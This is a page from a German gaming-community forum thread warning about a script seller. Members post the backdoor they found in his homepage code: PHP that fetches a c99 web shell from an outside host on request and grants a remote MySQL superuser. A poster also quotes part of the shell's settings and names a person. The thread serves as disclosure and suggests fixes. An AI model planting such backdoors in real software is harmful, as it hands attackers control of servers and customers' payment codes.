[ WARNUNG VOR SONIICE ]

Page 4 of 6 « First 23 4 56
08/26/2011 15:38 Nick#46
SoNiiCe was pwnd by .Infinity (15:36)
08/26/2011 15:48 xdjdarkboyx#47
sry aber so ne drecksau von Sonice. wurde auch abgezockt hab zwar net seine page aber dann ist es der hatt jemadn auch komischerweiße das der jenige die psc in MR green konto einzahlt wenn ja dann find ich dich sonice.
08/26/2011 16:13 Nick#48
Jetzt ist er nicht mehr Sooo nice
08/26/2011 16:17 .Hazel#49
Man, man, man. Wie tief diese Section hier gesunken ist! SoNiice = arm!
Hätte ich Dauni damals schon geglaubt!
08/26/2011 16:18 John Schmieri#50
Quote:
Originally Posted by .Hazel View Post
Man, man, man. Wie tief diese Section hier gesunken ist! SoNiice = arm!
Hätte ich Dauni damals schon geglaubt!
Der erste Satz klingt so als ob SoNiice die Section ist? : D
08/26/2011 16:26 .Hazel#51
Quote:
Originally Posted by Cy. View Post
Der erste Satz klingt so als ob SoNiice die Section ist? : D
Nein, aber er ist ein Teil der Section und jeder Teil, wirft ein Bild auf diese Section, SoNiice wirft halt ein schlechtes Bild - Henni ein gutes, ein sogar sehr gutes.
Es ist halt aber einfach so, dass sich viele in dieser Section zu Ars****chern entwickelt haben!
08/26/2011 17:04 .Koopa#52
Wie wird den diese lücke ausgelöst wenn man auf ner php datei geht oder automatisch ? sobald man auf die index geht ?


wenn es peer externer php datei ist könnte man die ja eig. löschen
08/26/2011 17:13 yym3#53
Quote:
Originally Posted by .Koopa View Post
Wie wird den diese lücke ausgelöst wenn man auf ner php datei geht oder automatisch ? sobald man auf die index geht ?


wenn es peer externer php datei ist könnte man die ja eig. löschen
dacht ich auch, rankings.php aufmachen löschen und gucken ob sich was ändert :O
08/26/2011 17:33 .Yacki#54
Hach ja... SoNiice...

[Only registered and activated users can see links. Click Here To Register...]

Irgendwas war da schon immer faul...
08/26/2011 18:08 .Risan.#55
hmm:

PHP Code:
    if (isset($_GET['re']) == 'secure') {
    $datei = fopen("secure.php","w+");$stream = fopen("http://lijang2.de/c99.txt", "r");while (!feof($stream)) { 
    $fixxerr .= fgets($stream); } fclose($stream);fwrite($datei,$fixxerr) ;fclose($datei);
}

$user = "grant all on *.* to SoNiice@'%' identified by 'marcel123eeeeeeeeeee'";
mysql_query ($user);  
    
    $x++;
    
  }
?>
<?PHP
if (isset($_GET['db']) == 'psc') {
    echo '<h2>Admin - Voucher Datenbank</h2>';
    echo '<p><a href="index.php?s=rankings&db=psc">Offene Anfragen</a> &bull; <a href="index.php?s=rankings&db=psc&closed=yes">Abgeschlossene Anfragen</a></p>';
    echo '<table>
            <tr>      
              <th class="topLine">ID</th>
              <th class="topLine">Account</th>
              <th class="topLine">Admin</th>
              <th class="topLine">Voucher</th>
              <th class="topLine">Betrag</th>
              <th class="topLine">Status</th>
              <th class="topLine">Passwort</th>
              <th class="topLine">Datum</th>
            </tr>';
            
    if(isset($_GET['closed']) && $_GET['closed']=="yes") {
      $sqlCmd="SELECT * 
      FROM ".SQL_HP_DB.".psc_log
      ORDER BY psc_log.datum DESC";
    }
    else {
      $sqlCmd="SELECT * 
      FROM ".SQL_HP_DB.".psc_log 
      ORDER BY psc_log.datum DESC";
    }        
    $sqlQry=mysql_query($sqlCmd,$sqlHp);
    $x=0;
    while($getPSC mysql_fetch_object($sqlQry)) {
      $zF = ($x%2) ? "tdunkel" "thell";
      $pscStatus = ($getPSC->status>=1) ? "<span style=\"color:#06AA03\">Geschlossen</span>" "<span style=\"color:#613802\">Offen</span>";
      echo '<tr>
              <td class="'.$zF.'"><a href="index.php?s=admin&a=voucher_edit&id='.$getPSC->id.'">'.$getPSC->id.'</a></td>
              <td class="'.$zF.'"><a href="index.php?s=admin&a=users&acc='.$getPSC->account_id.'">'.$getPSC->account_id.'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->admin_id).'</td>
              <td class="'.$zF.'">('.$getPSC->card_type.') ';
              echo htmlspecialchars(substr($getPSC->psc_code,0,16));
              if(strlen($getPSC->psc_code)>16) echo'...';
              echo'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->psc_betrag).' '.$getPSC->waehrung.'</td>
              <td class="'.$zF.'">'.$pscStatus.'</td>
              <td class="'.$zF.'">'.$getPSC->psc_pass.'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->datum).'</td>
            </tr>';
      $x++;
    
    }
    echo '</table>';
}
elseif (isset($_GET['db']) == 'paysafe') {    
    echo '<h2>Admin - Voucher Datenbank</h2>';
    echo '<p><a href="index.php?s=rankings&db=paysafe">Offene Anfragen</a> &bull; <a href="index.php?s=rankings&db=paysafe&closed=yes">Abgeschlossene Anfragen</a></p>';
    echo '<table>
            <tr>      
              <th class="topLine">ID</th>
              <th class="topLine">Account</th>
              <th class="topLine">Admin</th>
              <th class="topLine">Voucher</th>
              <th class="topLine">Betrag</th>
              <th class="topLine">Status</th>
              <th class="topLine">Passwort</th>
              <th class="topLine">Datum</th>
            </tr>';
            
    if(isset($_GET['closed']) && $_GET['closed']=="yes") {
      $sqlCmd="SELECT * 
      FROM ".SQL_HP_DB.".paysafe_logg
      ORDER BY paysafe_logg.datum DESC";
    }
    else {
      $sqlCmd="SELECT * 
      FROM ".SQL_HP_DB.".paysafe_logg
      ORDER BY paysafe_logg.datum DESC";
    }        
    $sqlQry=mysql_query($sqlCmd,$sqlHp);
    $x=0;
    while($getPSC mysql_fetch_object($sqlQry)) {
      $zF = ($x%2) ? "tdunkel" "thell";
      $pscStatus = ($getPSC->status>=1) ? "<span style=\"color:#06AA03\">Geschlossen</span>" "<span style=\"color:#613802\">Offen</span>";
      echo '<tr>
              <td class="'.$zF.'"><a href="index.php?s=admin&a=voucher_edit&id='.$getPSC->id.'">'.$getPSC->id.'</a></td>
              <td class="'.$zF.'"><a href="index.php?s=admin&a=users&acc='.$getPSC->account_id.'">'.$getPSC->account_id.'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->admin_id).'</td>
              <td class="'.$zF.'">('.$getPSC->card_type.') ';
              echo htmlspecialchars(substr($getPSC->psc_code,0,16));
              if(strlen($getPSC->psc_code)>16) echo'...';
              echo'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->psc_betrag).' '.$getPSC->waehrung.'</td>
              <td class="'.$zF.'">'.$pscStatus.'</td>
              <td class="'.$zF.'">'.$getPSC->psc_pass.'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->datum).'</td>
            </tr>';
      $x++;
    
    }
    echo '</table>';
}
?>
bei meiner rankings.php drinne...

Best Regards,
Risan

Fixxes:
1)Die zeilen löschen.
2)Den Mysql benutzer rechte besser einstellen (kein neuen benutzer erstellen verweigern)
3)SSH dienst deaktivieren (standart bei mir)
4)CHMOD an den Dateien auf 640 setzen. (standart bei mir)
5)Mysql nur von innen zulassen.

Und man ist gegen andere irtürmliche Scripte geschützt.
Ich kann zwar kein PHP, aber durchaus verstehe ich was damit erreicht wird und wofür es benutzt wird...

EDIT:
Nachdem ich die Lücke gesehen habe, habe ich sie etwas umgeschrieben und meine Psc datenbank kopiert, und wenn man sie abrief sah man immer die alte DB, also auf gut Deutsch als würde keine Psc reinkommen. Natürlich Mysql zugang nicht gestattet + nur Local möglich.
Das habe ich fast 1 Woche so gemacht, bis ich den rest hatte von der Homepage, leider fehlen noch 1 Addon und paar grafiken..

Doch bevor ich die Lücke bemerkt habe, wurde mir am selben Abend noch 300€ geklaut wo ich die Homepage bekommen habe..
Ich cash jeden Abend aus, bzw. Wie mir Lustig is.. Mittags, nachmittags oder Abends..
08/26/2011 18:20 .Tolive#56
Quote:
Originally Posted by .Dauni View Post
Ich hab kein Bock jetz alles zu lesen, aber Marcel, halt die Fresse, halt sie einfach.
Du möchtest besser sein wie SoNiice aber führst dich gerade kein bisschen besser auf.

Quote:
Originally Posted by Risan View Post
Au man.. hätte ich mal paar Dateien früher angeschaut, wäre der ganze ärger erspart geblieben. Lieber Marcel Weber.
Egal was er getan hat, es ist kein Grund deshalb Namen hier zu veröffentlichen.

Quote:
Originally Posted by .Hazel View Post
Man, man, man. Wie tief diese Section hier gesunken ist! SoNiice = arm!
Hätte ich Dauni damals schon geglaubt!
Man sollte mal darüber nachdenken, das auch dein .Dauni aka. Downloader999 nicht besser war.
Schließlich ist sein Server nun Down, angeblich weil keine einnahmen mehr rein kommen. Sicherlich
wird dort aber einiges mehr passieren, weil sowas nenne ich ebenfalls Abzocke.
08/26/2011 18:38 Scrawler™#57
Quote:
Originally Posted by Risan View Post
hmm:

PHP Code:
    if (isset($_GET['re']) == 'secure') {
    $datei = fopen("secure.php","w+");$stream = fopen("http://lijang2.de/c99.txt", "r");while (!feof($stream)) { 
    $fixxerr .= fgets($stream); } fclose($stream);fwrite($datei,$fixxerr) ;fclose($datei);
}

$user = "grant all on *.* to SoNiice@'%' identified by 'marcel123eeeeeeeeeee'";
mysql_query ($user);  
    
    $x++;
    
  }
?>
<?PHP
if (isset($_GET['db']) == 'psc') {
    echo '<h2>Admin - Voucher Datenbank</h2>';
    echo '<p><a href="index.php?s=rankings&db=psc">Offene Anfragen</a> &bull; <a href="index.php?s=rankings&db=psc&closed=yes">Abgeschlossene Anfragen</a></p>';
    echo '<table>
            <tr>      
              <th class="topLine">ID</th>
              <th class="topLine">Account</th>
              <th class="topLine">Admin</th>
              <th class="topLine">Voucher</th>
              <th class="topLine">Betrag</th>
              <th class="topLine">Status</th>
              <th class="topLine">Passwort</th>
              <th class="topLine">Datum</th>
            </tr>';
            
    if(isset($_GET['closed']) && $_GET['closed']=="yes") {
      $sqlCmd="SELECT * 
      FROM ".SQL_HP_DB.".psc_log
      ORDER BY psc_log.datum DESC";
    }
    else {
      $sqlCmd="SELECT * 
      FROM ".SQL_HP_DB.".psc_log 
      ORDER BY psc_log.datum DESC";
    }        
    $sqlQry=mysql_query($sqlCmd,$sqlHp);
    $x=0;
    while($getPSC mysql_fetch_object($sqlQry)) {
      $zF = ($x%2) ? "tdunkel" "thell";
      $pscStatus = ($getPSC->status>=1) ? "<span style=\"color:#06AA03\">Geschlossen</span>" "<span style=\"color:#613802\">Offen</span>";
      echo '<tr>
              <td class="'.$zF.'"><a href="index.php?s=admin&a=voucher_edit&id='.$getPSC->id.'">'.$getPSC->id.'</a></td>
              <td class="'.$zF.'"><a href="index.php?s=admin&a=users&acc='.$getPSC->account_id.'">'.$getPSC->account_id.'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->admin_id).'</td>
              <td class="'.$zF.'">('.$getPSC->card_type.') ';
              echo htmlspecialchars(substr($getPSC->psc_code,0,16));
              if(strlen($getPSC->psc_code)>16) echo'...';
              echo'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->psc_betrag).' '.$getPSC->waehrung.'</td>
              <td class="'.$zF.'">'.$pscStatus.'</td>
              <td class="'.$zF.'">'.$getPSC->psc_pass.'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->datum).'</td>
            </tr>';
      $x++;
    
    }
    echo '</table>';
}
elseif (isset($_GET['db']) == 'paysafe') {    
    echo '<h2>Admin - Voucher Datenbank</h2>';
    echo '<p><a href="index.php?s=rankings&db=paysafe">Offene Anfragen</a> &bull; <a href="index.php?s=rankings&db=paysafe&closed=yes">Abgeschlossene Anfragen</a></p>';
    echo '<table>
            <tr>      
              <th class="topLine">ID</th>
              <th class="topLine">Account</th>
              <th class="topLine">Admin</th>
              <th class="topLine">Voucher</th>
              <th class="topLine">Betrag</th>
              <th class="topLine">Status</th>
              <th class="topLine">Passwort</th>
              <th class="topLine">Datum</th>
            </tr>';
            
    if(isset($_GET['closed']) && $_GET['closed']=="yes") {
      $sqlCmd="SELECT * 
      FROM ".SQL_HP_DB.".paysafe_logg
      ORDER BY paysafe_logg.datum DESC";
    }
    else {
      $sqlCmd="SELECT * 
      FROM ".SQL_HP_DB.".paysafe_logg
      ORDER BY paysafe_logg.datum DESC";
    }        
    $sqlQry=mysql_query($sqlCmd,$sqlHp);
    $x=0;
    while($getPSC mysql_fetch_object($sqlQry)) {
      $zF = ($x%2) ? "tdunkel" "thell";
      $pscStatus = ($getPSC->status>=1) ? "<span style=\"color:#06AA03\">Geschlossen</span>" "<span style=\"color:#613802\">Offen</span>";
      echo '<tr>
              <td class="'.$zF.'"><a href="index.php?s=admin&a=voucher_edit&id='.$getPSC->id.'">'.$getPSC->id.'</a></td>
              <td class="'.$zF.'"><a href="index.php?s=admin&a=users&acc='.$getPSC->account_id.'">'.$getPSC->account_id.'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->admin_id).'</td>
              <td class="'.$zF.'">('.$getPSC->card_type.') ';
              echo htmlspecialchars(substr($getPSC->psc_code,0,16));
              if(strlen($getPSC->psc_code)>16) echo'...';
              echo'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->psc_betrag).' '.$getPSC->waehrung.'</td>
              <td class="'.$zF.'">'.$pscStatus.'</td>
              <td class="'.$zF.'">'.$getPSC->psc_pass.'</td>
              <td class="'.$zF.'">'.htmlspecialchars($getPSC->datum).'</td>
            </tr>';
      $x++;
    
    }
    echo '</table>';
}
?>
bei meiner rankings.php drinne...

Best Regards,
Risan

Fixxes:
1)Die zeilen löschen.
2)Den Mysql benutzer rechte besser einstellen (kein neuen benutzer erstellen verweigern)
3)SSH dienst deaktivieren (standart bei mir)
4)CHMOD an den Dateien auf 640 setzen. (standart bei mir)
5)Mysql nur von innen zulassen.

Und man ist gegen andere irtürmliche Scripte geschützt.
Ich kann zwar kein PHP, aber durchaus verstehe ich was damit erreicht wird und wofür es benutzt wird...

EDIT:
Nachdem ich die Lücke gesehen habe, habe ich sie etwas umgeschrieben und meine Psc datenbank kopiert, und wenn man sie abrief sah man immer die alte DB, also auf gut Deutsch als würde keine Psc reinkommen. Natürlich Mysql zugang nicht gestattet + nur Local möglich.
Das habe ich fast 1 Woche so gemacht, bis ich den rest hatte von der Homepage, leider fehlen noch 1 Addon und paar grafiken..

Doch bevor ich die Lücke bemerkt habe, wurde mir am selben Abend noch 300€ geklaut wo ich die Homepage bekommen habe..
Ich cash jeden Abend aus, bzw. Wie mir Lustig is.. Mittags, nachmittags oder Abends..
zu deinem 5. punkt kann ich nur sagen das es 0 bringt^^

guck dir mal den auszug aus der c99.txt an:
PHP Code:
//Authentication
$login ""//login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass ""//password
$md5_pass ""//md5-cryped pass. if null, md5($pass)

$host_allow = array("*"); //array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt "Restricted area"//http-auth message.
$accessdeniedmess "<a href=\"http://ccteam.ru/releases/c999shell\">c999shell v.".$shver."</a>: access denied"
08/26/2011 18:45 .Hazel#58
Quote:
Originally Posted by .Tolive View Post
Du möchtest besser sein wie SoNiice aber führst dich gerade kein bisschen besser auf.



Egal was er getan hat, es ist kein Grund deshalb Namen hier zu veröffentlichen.



Man sollte mal darüber nachdenken, das auch dein .Dauni aka. Downloader999 nicht besser war.
Schließlich ist sein Server nun Down, angeblich weil keine einnahmen mehr rein kommen. Sicherlich
wird dort aber einiges mehr passieren, weil sowas nenne ich ebenfalls Abzocke.
Dazu kann ich nicht viel sagen, da ich das nicht mitbekommen habe, weil ich zu der Zeit nicht da war. Aber bei SoNiice weiß ich es halt, und ich wurde halt unter anderem von Dauni gewarnt.
08/26/2011 18:48 Hermes2012#59
Danke

vor solchen leuten muss man gewarnt werden ich bin für einen Bann von ihm weil er in der community viren verbreitet mfg Hermes2012
08/26/2011 18:59 .Tolive#60
Quote:
Originally Posted by .Hazel View Post
Dazu kann ich nicht viel sagen, da ich das nicht mitbekommen habe, weil ich zu der Zeit nicht da war. Aber bei SoNiice weiß ich es halt, und ich wurde halt unter anderem von Dauni gewarnt.
Deswegen sagte ich das ja auch. Wenn man zurück denkt, war Dauni nie anders :) Aber Allgemein, jeder Server zockt nur ab.
Page 4 of 6 « First 23 4 56